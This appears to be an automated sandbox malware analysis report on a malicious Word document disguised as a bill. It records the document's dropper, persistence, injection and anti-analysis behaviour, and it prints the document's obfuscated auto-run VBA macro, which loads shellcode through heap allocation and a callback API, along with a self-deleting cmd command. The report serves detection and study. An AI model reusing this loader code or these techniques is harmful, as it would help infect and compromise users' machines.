Analysis Report

Overview

General Information

Joe Sandbox Version:	17.0.0
Analysis ID:	14
Start time:	15:28:20
Joe Sandbox Product:	Desktop
Start date:	08.12.2016
Overall analysis duration:	0h 7m 42s
Report type:	full
Sample file name:	bill_0803708258.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	W7 32bit with Office 2010
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	EGA enabled VBA Instrumentation enabled
Detection:	MAL
Classification:	mal100.evad.expl.winDOC@11/8@0/0
Cookbook Comments:	Internet access has been disabled Found application associated with file extension: .doc Found Word or Excel document Simulate clicks Found new Word/Excel, stop clicking Number of clicks 24 Close Viewer
Warnings:	Show All Max analysis timeout: 420s exceeded, the analysis took too long Exclude process from analysis (whitelisted): WmiApSrv.exe, conhost.exe, dllhost.exe Report size exceeded maximum capacity and may have missing behavior information.

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	100	0 - 100	Report FP / FN

Classification

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox

Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook

Sample sleeps for a long time, analyze it with the 'Bypass long sleeps' cookbook

Signature Overview

Click to jump to signature section

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: re717.exe.3848.dr

Networking:

Downloads files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C403945E-A4C2-47BD-9199-0E270216D15D}.tmp

Boot Survival:

Creates an autostart registry key

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinHost32
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinHost32

Creates an autostart registry key pointing to binary in C:\Windows

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe

Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinHost32

Persistence and Installation Behavior:

Drops PE files

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe	File created: C:\Windows\System32\WinHost32.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe

Drops PE files to the windows directory (C:\Windows)

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe

File created: C:\Windows\System32\WinHost32.exe

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Windows\System32\WinHost32.exe

Executable created and started: C:\Windows\System32\WinHost32.exe

Data Obfuscation:

Entry point lies outside standard sections

Show sources

Source: initial sample

Static PE information: section where entry point is pointing to: .data

PE file contains sections with non-standard names

Show sources

Source: re717.exe.3848.dr	Static PE information: section name: .code
Source: WinHost32.exe.3048.dr	Static PE information: section name: .code

System Summary:

Tries to open an application configuration file (.cfg)

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe

File opened: C:\Windows\System32\WinHost32.exe.cfg

Checks whether correct version of .NET is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\Upgrades

Executable creates window controls seldom found in malware

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Window found: window name: SysTabControl32

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Checks if Microsoft Office is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_USERS\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Document has a 'bytes' value indicative for goodware

Show sources

Source: bill_0803708258.doc

Initial sample: OLE document summary bytes = 11000

Classification label

Show sources

Source: classification engine

Classification label: mal100.evad.expl.winDOC@11/8@0/0

Creates files inside the user directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\luketaylor\AppData\Roaming\Microsoft\Office\Recent\bill_0803708258.LNK

Creates temporary files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\LUKETA~1\AppData\Local\Temp\CVR44C7.tmp

Document contains an OLE Word Document stream indicating a Microsoft Word file

Show sources

Source: bill_0803708258.doc

OLE indicator, Word Document stream: true

Reads ini files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Reads software policies

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Spawns processes

Show sources

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Source: unknown	Process created: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe
Source: unknown	Process created: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe
Source: unknown	Process created: C:\Windows\System32\WinHost32.exe
Source: unknown	Process created: C:\Windows\System32\cmd.exe
Source: unknown	Process created: C:\Windows\System32\WinHost32.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe	Process created: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe	Process created: C:\Windows\System32\WinHost32.exe C:\Windows\System32\WinHost32.exe
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe	Process created: C:\Windows\System32\cmd.exe /c del C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe >> NUL
Source: C:\Windows\System32\WinHost32.exe	Process created: C:\Windows\System32\WinHost32.exe C:\Windows\System32\WinHost32.exe

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Creates files inside the system directory

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe

File created: C:\Windows\System32\WinHost32.exe

Document contains embedded VBA macros

Show sources

Source: bill_0803708258.doc

OLE indicator, VBA macros: true

Document contains summary information with irregular field values

Show sources

Source: bill_0803708258.doc

OLE document summary: title field not present or empty

PE file contains executable resources (Code or Archives)

Show sources

Source: re717.exe.3848.dr	Static PE information: Resource name: RT_ACCELERATOR type: Hitachi SH big-endian COFF object, not stripped
Source: WinHost32.exe.3048.dr	Static PE information: Resource name: RT_ACCELERATOR type: Hitachi SH big-endian COFF object, not stripped

Reads the hosts file

Show sources

Source: C:\Windows\System32\WinHost32.exe

File read: C:\Windows\System32\drivers\etc\hosts

Document contains an embedded VBA macro which executes code when the document is opened / closed

Show sources

Source: bill_0803708258.doc	OLE, VBA macro line: Private Sub Document_Open()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Open			Name: Document_Open

Document contains an embedded VBA macro which may execute processes

Show sources

Source: bill_0803708258.doc

OLE, VBA macro line: Dim eggshell As Variant

Document contains an embedded VBA macro which may execute shellcode

Show sources

Source: bill_0803708258.doc	OLE, VBA macro line: Public Declare PtrSafe Function arranger Lib "kernel32" Alias "EnumResourceTypesW" (ByVal hModule As Any, ByVal lpEnumFunc As Any, lParam As Any) As LongPtr
Source: bill_0803708258.doc	OLE, VBA macro line: Public Declare Function arranger Lib "kernel32" Alias "EnumResourceTypesW" (ByVal hModule As Any, ByVal lpEnumFunc As Any, lParam As Any) As Long

Document contains an embedded VBA macro with suspicious strings

Show sources

Source: bill_0803708258.doc	OLE, VBA macro line: Public Declare PtrSafe Function inserted Lib "kernel32" Alias "CreateEventA" (lpEventAttributes As Any,bManualReset As LongPtr,bInitialState As LongPtr,lpName As String)
Source: bill_0803708258.doc	OLE, VBA macro line: Public Declare PtrSafe Function impissation Lib "kernel32" Alias "HeapCreate" (ByVal abortive As LongPtr, ByVal gyratory As LongPtr, ByVal soldering As LongPtr) As LongPtr
Source: bill_0803708258.doc	OLE, VBA macro line: Public Declare PtrSafe Function cyclosporeae Lib "kernel32" Alias "GetPriorityClass" (hProcess As LongPtr) As LongPtr
Source: bill_0803708258.doc	OLE, VBA macro line: Public Declare PtrSafe Function arranger Lib "kernel32" Alias "EnumResourceTypesW" (ByVal hModule As Any, ByVal lpEnumFunc As Any, lParam As Any) As LongPtr
Source: bill_0803708258.doc	OLE, VBA macro line: Public Declare PtrSafe Function plevna Lib "kernel32" Alias "HeapAlloc" (ByVal asterismal As LongPtr, ByVal cholelithiasis As LongPtr, ByVal enveloping As LongPtr) As LongPtr
Source: bill_0803708258.doc	OLE, VBA macro line: Public Declare Function grains Lib "kernel32" Alias "GetPriorityClass" (hProcess As Long) As Long
Source: bill_0803708258.doc	OLE, VBA macro line: Public Declare Function beige Lib "kernel32" Alias "CreateEventA" (lpEventAttributes As Any, bManualReset As Long, bInitialState As Long, lpName As String)
Source: bill_0803708258.doc	OLE, VBA macro line: Public Declare Function arranger Lib "kernel32" Alias "EnumResourceTypesW" (ByVal hModule As Any, ByVal lpEnumFunc As Any, lParam As Any) As Long
Source: bill_0803708258.doc	OLE, VBA macro line: Public Declare Function plevna Lib "kernel32" Alias "HeapAlloc" (ByVal reportable As Long, ByVal melanosis As Long, ByVal macrencephaly As Long) As Long
Source: bill_0803708258.doc	OLE, VBA macro line: Public Declare Function impissation Lib "kernel32" Alias "HeapCreate" (ByVal relentless As Long, ByVal definable As Long, ByVal indefectibility As Long) As Long

Document contains an embedded VBA with base64 encoded strings

Show sources

Source: VBA code instrumentation

OLE, VBA macro: Module ThisDocument, Function Document_Open, String gesneriaceae

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe	Memory written: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WinHost32.exe	Memory written: C:\Windows\System32\WinHost32.exe base: 400000 value starts with: 4D5A

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe

Thread register set: target process: 3048

Sets debug register (to hijack the execution of another thread)

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe

Thread register set: 3048 12FBD4

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Windows\System32\WinHost32.exe

System information queried: KernelDebuggerInformation

Malware Analysis System Evasion:

Queries a list of all running processes

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe

Process information queried: ProcessInformation

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Window / User API: threadDelayed 1091
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Window / User API: windowPlacementGot 636
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe	Window / User API: threadDelayed 115040
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe	Window / User API: threadDelayed 384961
Source: C:\Windows\System32\WinHost32.exe	Window / User API: threadDelayed 21080
Source: C:\Windows\System32\WinHost32.exe	Window / User API: threadDelayed 478921

Found dropped PE file which has not been started or loaded

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Dropped PE file which has not been started: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe	Dropped PE file which has not been started: C:\Windows\System32\WinHost32.exe

Is looking for software installed on the system

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Registry key enumerated: More than 113 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe TID: 3040	Thread sleep count: 115040 > 30
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe TID: 3040	Thread sleep count: 384961 > 30
Source: C:\Windows\System32\WinHost32.exe TID: 2468	Thread sleep count: 21080 > 30
Source: C:\Windows\System32\WinHost32.exe TID: 2468	Thread sleep count: 478921 > 30

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Behavior Graph

Legend:

Process
Signature
Created File
DNS/IP Info

Yara Overview

No Yara matches

Screenshot

Startup

system is w7

WINWORD.EXE (PID: 3848 MD5: 113371C5AC72FCE072F707C55E7845B9)

re717.exe (PID: 3036 MD5: 18B827BD1ABF15A978C89878BC02B355)

re717.exe (PID: 3048 MD5: 18B827BD1ABF15A978C89878BC02B355)

WinHost32.exe (PID: 748 MD5: 18B827BD1ABF15A978C89878BC02B355)

WinHost32.exe (PID: 1940 MD5: 18B827BD1ABF15A978C89878BC02B355)

cmd.exe (PID: 956 cmdline: /c del C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe >> NUL MD5: AD7B9C14083B52BC532FBA5948342B98)

cleanup

Created / dropped Files

File Path	Type and Hashes
C:\Users\LUKETA~1\AppData\Local\Temp\VBE\MSForms.exd	Type: data MD5: 72B29AFC3BB1067012FAB75BABA0DA8D SHA: AAB474BE967D0C5D66AE7B3F364D6DB45287776F SHA-256: 42949618EE0E0AD50F1720DCE2899613CA50AAA33BBF0BEFA214B5F4FD8BA3B9 SHA-512: E6F1C047909E27DD65ACF633A70D789FF5903FD8F2FF319DAF88281419935993814325FEC0BAA5A2BDACA0050A466E62710D4FFD93C6CD7F24F8196B37D7BB3E
C:\Users\LUKETA~1\AppData\Local\Temp\re717.exe	Type: PE32 executable (GUI) Intel 80386, for MS Windows MD5: 18B827BD1ABF15A978C89878BC02B355 SHA: 9D28701C0D7ECE0178D8A9654F5CA83C51DF483C SHA-256: C086054175404A54973E9E2542856B16A297A827A70ADB8065168D76130E0B7B SHA-512: 41DBF41339D2A39D145E2E329E0E470919F49941795CD57ECBDC30E9D251640ABCC3A9C9BCFA3EA2F2536E461184E24D5AEA92DC391B2240751725D4FAFA2E92
C:\Users\luketaylor\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C403945E-A4C2-47BD-9199-0E270216D15D}.tmp	Type: FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375" MD5: 5D4D94EE7E06BBB0AF9584119797B23A SHA: DBB111419C704F116EFA8E72471DD83E86E49677 SHA-256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1 SHA-512: 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
C:\Users\luketaylor\AppData\Roaming\Microsoft\Office\Recent\bill_0803708258.LNK	Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 3 08:30:27 2016, mtime=Sat Dec 3 08:30:27 2016, atime=Thu Dec 8 14:29:39 2016, length=168960, window=hide MD5: 683AD02EDEF1A3E120C711F93CDB5E0E SHA: EB5700B3B090F5C5F9FB7DCAC2FA613E4C993CD1 SHA-256: 0DF940E35B326B34145476FC710F3CEE7C694CBE97DB9F55BDE653B21F4EC2A4 SHA-512: A9AE87CDB7EEA7FBC2A58884C5A37F20AD3C723FED217E6BA76A0570CE189B5FCADEE38CB1853C55E610190A32CF0C63F114274CC3A4664F625B5DDFAB601630
C:\Users\luketaylor\AppData\Roaming\Microsoft\Office\Recent\index.dat	Type: ASCII text, with CRLF line terminators MD5: 80F63D6E4821302DE5CF44848935946C SHA: 2176DDAFC1518B366BA7F7382A24583C5E3F7EC2 SHA-256: 74A47E63E02051093FBC280CB48BB2666062EAF46BCB18EA33A81CC167B503F6 SHA-512: EAEB772CBB71BA739ED7B05FE77B5B1439CB78C093EF120692C44CC14DB1B968FF5CF3E25E60ACDFF74E0BF3E3A96F783EA9060FBFFDBAC18943C88D49A95457
C:\Users\luketaylor\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	Type: data MD5: A7D581A9A56CE64C8A944D33BE135CB8 SHA: 80837A43B71FB68DA6F11CD1EC498AA2B28CC322 SHA-256: 556BA275909CC307A2EA92AEE06ED33B5D0E5737522CE8191C978E157BC107AC SHA-512: A26D8D97D95C65E06639E3A88CCCFF96864CD323E2A7D2CC219345243ACEB420D589A2F43A8E621AE05112E3E3DFF6CBFBF2BC975057823737BDD480A0C8E0D6
C:\Windows\System32\WinHost32.exe	Type: PE32 executable (GUI) Intel 80386, for MS Windows MD5: 18B827BD1ABF15A978C89878BC02B355 SHA: 9D28701C0D7ECE0178D8A9654F5CA83C51DF483C SHA-256: C086054175404A54973E9E2542856B16A297A827A70ADB8065168D76130E0B7B SHA-512: 41DBF41339D2A39D145E2E329E0E470919F49941795CD57ECBDC30E9D251640ABCC3A9C9BCFA3EA2F2536E461184E24D5AEA92DC391B2240751725D4FAFA2E92
C:\~$ll_0803708258.doc	Type: data MD5: A7D581A9A56CE64C8A944D33BE135CB8 SHA: 80837A43B71FB68DA6F11CD1EC498AA2B28CC322 SHA-256: 556BA275909CC307A2EA92AEE06ED33B5D0E5737522CE8191C978E157BC107AC SHA-512: A26D8D97D95C65E06639E3A88CCCFF96864CD323E2A7D2CC219345243ACEB420D589A2F43A8E621AE05112E3E3DFF6CBFBF2BC975057823737BDD480A0C8E0D6

Contacted Domains/Contacted IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

Static File Info

General
File type:	0
TrID:	Microsoft Word document (32009/1) 77.10% Generic OLE2 / Multistream Compound File (8008/1) 19.29% Java Script embedded in Visual Basic Script (1500/0) 3.61%
File name:	bill_0803708258.doc
File size:	166400
MD5:	3ebd49f7168ff668d617a174b1e7c30a
SHA1:	0dfeda64a48d26442660ed954c2aca8d1f1ba4e2
SHA256:	e1cfa6e63e13095e4060b18e11b091712fb8508b403eb0b1de271ee73e5e8008
SHA512:	c55bab4b42a07c307eb6ee585e62699cf89be6b4911153d571b6589f2a57f24da84b82f8dd9767176fe438fdce3688f434603506abec38374aa92a9043485b87

File Icon

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File

Indicators
Has Summary Info:	True
Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary
Code Page:	1252
Title:
Subject:
Author:	Helen
Keywords:
Comments:
Template:	Normal.dot
Last Saved By:	User
Revion Number:	13
Total Edit Time:	120
Create Time:	2016-09-26 13:32:00
Last Saved Time:	2016-09-26 14:35:00
Number of Pages:	1
Number of Words:	0
Number of Characters:	2
Creating Application:	Microsoft Office Word
Security:	0

Document Summary
Document Code Page:	-535
Number of Bytes:	11000
Number of Lines:	1
Number of Paragraphs:	1
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	726502

Streams with VBA

VBA File Name: ThisDocument.cls, Stream Size: 8470

General
Stream Path:	Macros/VBA/ThisDocument
VBA File Name:	ThisDocument.cls
Stream Size:	8470
Data ASCII:	. . . . . . . . . 6 . . . . . . . . . . . . . . . > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 36 07 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff 3e 07 00 00 a2 17 00 00 00 00 00 00 01 00 00 00 af d1 d3 1e 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code with Deobfuscations

Attribute VB_Name = "ThisDocument"

Attribute VB_Base = "1Normal.ThisDocument"

Attribute VB_GlobalNameSpace = False

Attribute VB_Creatable = False

Attribute VB_PredeclaredId = True

Attribute VB_Exposed = True

Attribute VB_TemplateDerived = True

Attribute VB_Customizable = True

Dim hydrocharitaceae As String

Dim munching As Integer

Dim differ As Long

Dim titubate As String

Function agural(miniver, longheaded)

    Dim burrheaded As String

    Dim abysm As Byte

    differ = differ \ 426

    Dim brownstone As Integer

    Dim guyana As Long

    Dim argonaut As Integer

    Dim furuncle As String

    Dim gnat As Long

    methyltestosterone guyana, ByVal VarPtr(longheaded) + 8, 4

    munching = differ + 127

    gnat = miniver

    For archetype = 26 To 76

        sciotlo = 76

        munching = munching \ 236

        dusky = LCase("Ca") + UCase("tAlatIc")

        dusky = "erecti" & LCase("Ng")

    Next archetype

    

    methyltestosterone ByVal gnat, ByVal guyana, 17 - 45 + 102 + 3148

    differ = munching - 433

End Function

Sub bloodied()

    Dim airhole As Integer

    Dim anaerobic As Integer

    bullshot = crappie.csociality.ControlTipText

    anemometric = andosite.phonocamptic(bullshot)

    For eastcentral = 42 To 67

        dingbat = 67

        titubate = "gleesome"

        ectoproct = Left("piapostasy", 2) & "geon" & Mid("stockistholemotherofpearl", 9, 4)

        ectoproct = UCase("Pr") & Left("ayinitaly", 4) & Right("basedg", 1)

    Next eastcentral

    

    saucepan = "gavia"

    #If Win64 Then

    Dim bigswoln As Integer

    Dim comatose As LongPtr

    Dim limewater As Long

    #Else

    Dim guerrilla As Variant

    Dim unmaligned As Long

    Dim comatose As Long

    #End If

    besom = 35 - 85 + 3 + 47

    acidfast = "secularization"

    acquest = 4096

    ablepsia = 11

    While ablepsia < 14

        alternator = Left("boarmed", 2) + Right("epitheliodiling", 5)

        grosgrain = UCase("CS") & Mid("debrisubstitutenonsmoker", 7, 9)

        ablepsia = ablepsia + 1

        munching = differ - 318

        Wend

        

        loiseleuria = impissation(262144, 0, 0)

        comatose = plevna(loiseleuria, 0, 3287)

        dividing = "abrupt"

        Dim dirtyminded As String

        disclose = "touchstone"

        peacocks = Right("domesticationbe", 2) + UCase("EfY")

        dirtyminded = misstanding

        striated = 3

        While striated < 8

            striated = striated + 1

            titubate = "archerfish"

            Wend

            

            affriction = anemometric

            biliary = "cotinus"

            agural comatose, affriction

            cerambycidae = "cycling"

            #If Win64 Then

            Dim eggshell As Variant

            contagion = "chewy"

            occlusion = LCase("ab") & Mid("afterhourslepscartload", 11, 4) & "y"

            gasp = "advowson"

            mors = 64 - 58 + 125 + 445

            #Else

            mors = 22 + 484 + 1727

            #End If

            Dim di As String

            Dim stopwatch As Long

            Dim deathrate As Long

            deathrate = 0

            Dim galician As Long

            galician = comatose + mors

            oman = arranger(deathrate, galician, dirtyminded)

            For tartars = 12 To 54

                borrower = 54

                munching = munching - 219

                cortes = Mid("atrialbebastion", 7, 2) & Right("bassettowitch", 5)

                cortes = LCase("AM") & LCase("BiveR") & "sion"

            Next tartars

            

        End Sub

        

        Function misstanding()

        Dim aise As Long

        Dim malfeasance As Long

        For dekagram = 5 To 56

            wires = 56

            titubate = titubate

            aslant = "fo" & Left("renomarchantia", 4) & Right("whiteliveredon", 2)

            aslant = Left("stpussycat", 2) & Mid("ursidaerucklithodidae", 8, 4)

        Next dekagram

        

        constantan = ThisDocument.Path

        misstanding = constantan & "/" & T

VBA Code

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim hydrocharitaceae As String
Dim munching As Integer
Dim differ As Long
Dim titubate As String
Function agural(miniver, longheaded)
Dim burrheaded As String
Dim abysm As Byte
differ = differ \ 426
Dim brownstone As Integer
Dim guyana As Long
Dim argonaut As Integer
Dim furuncle As String
Dim gnat As Long
methyltestosterone guyana, ByVal VarPtr(longheaded) + 8, 4
munching = differ + 127
gnat = miniver
For archetype = 26 To 76
sciotlo = 76
munching = munching \ 236
dusky = LCase("Ca") + UCase("tAlatIc")
dusky = "er" & "ecti" & LCase("Ng")
Next archetype

methyltestosterone ByVal gnat, ByVal guyana, 17 - 45 + 102 + 3148
differ = munching - 433
End Function
Sub bloodied()
Dim airhole As Integer
Dim anaerobic As Integer
bullshot = crappie.csociality.ControlTipText
anemometric = andosite.phonocamptic(bullshot)
For eastcentral = 42 To 67
dingbat = 67
titubate = "gleesome"
ectoproct = Left("piapostasy", 2) & "geon" & Mid("stockistholemotherofpearl", 9, 4)
ectoproct = UCase("Pr") & Left("ayinitaly", 4) & Right("basedg", 1)
Next eastcentral

saucepan = "gavia"
#If Win64 Then
Dim bigswoln As Integer
Dim comatose As LongPtr
Dim limewater As Long
#Else
Dim guerrilla As Variant
Dim unmaligned As Long
Dim comatose As Long
#End If
besom = 35 - 85 + 3 + 47
acidfast = "secularization"
acquest = 4096
ablepsia = 11
While ablepsia < 14
alternator = Left("boarmed", 2) + Right("epitheliodiling", 5)
grosgrain = UCase("CS") & Mid("debrisubstitutenonsmoker", 7, 9)
ablepsia = ablepsia + 1
munching = differ - 318
Wend

loiseleuria = impissation(262144, 0, 0)
comatose = plevna(loiseleuria, 0, 3287)
dividing = "abrupt"
Dim dirtyminded As String
disclose = "touchstone"
peacocks = Right("domesticationbe", 2) + UCase("EfY")
dirtyminded = misstanding
striated = 3
While striated < 8
striated = striated + 1
titubate = "archerfish"
Wend

affriction = anemometric
biliary = "cotinus"
agural comatose, affriction
cerambycidae = "cycling"
#If Win64 Then
Dim eggshell As Variant
contagion = "chewy"
occlusion = LCase("ab") & Mid("afterhourslepscartload", 11, 4) & "y"
gasp = "advowson"
mors = 64 - 58 + 125 + 445
#Else
mors = 22 + 484 + 1727
#End If
Dim di As String
Dim stopwatch As Long
Dim deathrate As Long
deathrate = 0
Dim galician As Long
galician = comatose + mors
oman = arranger(deathrate, galician, dirtyminded)
For tartars = 12 To 54
borrower = 54
munching = munching - 219
cortes = Mid("atrialbebastion", 7, 2) & Right("bassettowitch", 5)
cortes = LCase("AM") & LCase("BiveR") & "sion"
Next tartars

End Sub

Function misstanding()
Dim aise As Long
Dim malfeasance As Long
For dekagram = 5 To 56
wires = 56
titubate = titubate
aslant = "fo" & Left("renomarchantia", 4) & Right("whiteliveredon", 2)
aslant = Left("stpussycat", 2) & Mid("ursidaerucklithodidae", 8, 4)
Next dekagram

constantan = ThisDocument.Path
misstanding = constantan & "/" & ThisDocument.Name
End Function
Sub HeaderFooterObject()
  Dim MyText As String
  MyHeaderText = "<Replace this with your text>"
  MyFooterText = "<Replace this with your text>"
  With ActiveDocument.Sections(1)
    .Headers(wdHeaderFooterPrimary).Range.Text = MyHeaderText
    .Footers(wdHeaderFooterPrimary).Range.Text = MyFooterText
  End With
End Sub

Private Sub Document_Open()
Dim casa As Byte
Dim omnipresence As Variant
aldol = "gesneriaceae"
bloodied
microtus = 80
arcidae = 74
If microtus + arcidae < 8 Then
microtus = "mo" + UCase("sT")
titubate = "bountiful"
eruditeness = "mot" + "orized"
Else
munching = munching / 280
arcidae = 9
End If
End Sub

